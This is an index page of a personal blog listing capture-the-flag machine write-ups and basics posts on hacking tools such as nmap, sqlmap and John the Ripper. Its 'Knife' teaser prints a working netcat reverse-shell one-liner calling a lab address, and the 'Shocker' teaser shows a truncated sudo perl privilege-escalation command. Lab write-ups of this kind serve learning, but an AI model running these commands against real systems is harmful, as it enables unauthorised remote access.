top of page
WELCOME TO MY TECH ON IT

Home: Blog2
Search


Cap
Learn about Wireshark !


Valentine
searchsploit, base 64 decoding, openssl, ssh using a key


Blue
Learn about EternalBlue !


Jerry
Learn about Metasploit !


Legacy
Learn about Metasploit!


Heist
Learn about hashcat, lookupsid.py, evil-winrm, procdump.exe and strings.exe !


Knife
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.3 1234 >/tmp/f


Explore
How to hack an Android!


Shocker
Privilege Escalation with :
sudo /usr/bin/perl -e 'exec "/bin/s


Devel
Learn how to create your own exploit using msfvenom!


Optimum
Learn about Lester (Exploit Suggester) in Metasploit!


Granny
Learn about Lester (Exploit Suggester) in Metasploit!


Grandpa
Learn about Lester (Exploit Suggester) in Metasploit!
Basics - Useful commands
If your shell is not stable use this command to make it more stable python3 -c 'import pty; pty.spawn(“/bin/bash”)'


Basics - How to use nmap
How to use nmap !


Basics - How to use sqlmap
Learn how to use sqlmap !


Basics - How to use John The Ripper
Learn about John The Ripper !


Basics - Common passwords
Common passwords
bottom of page
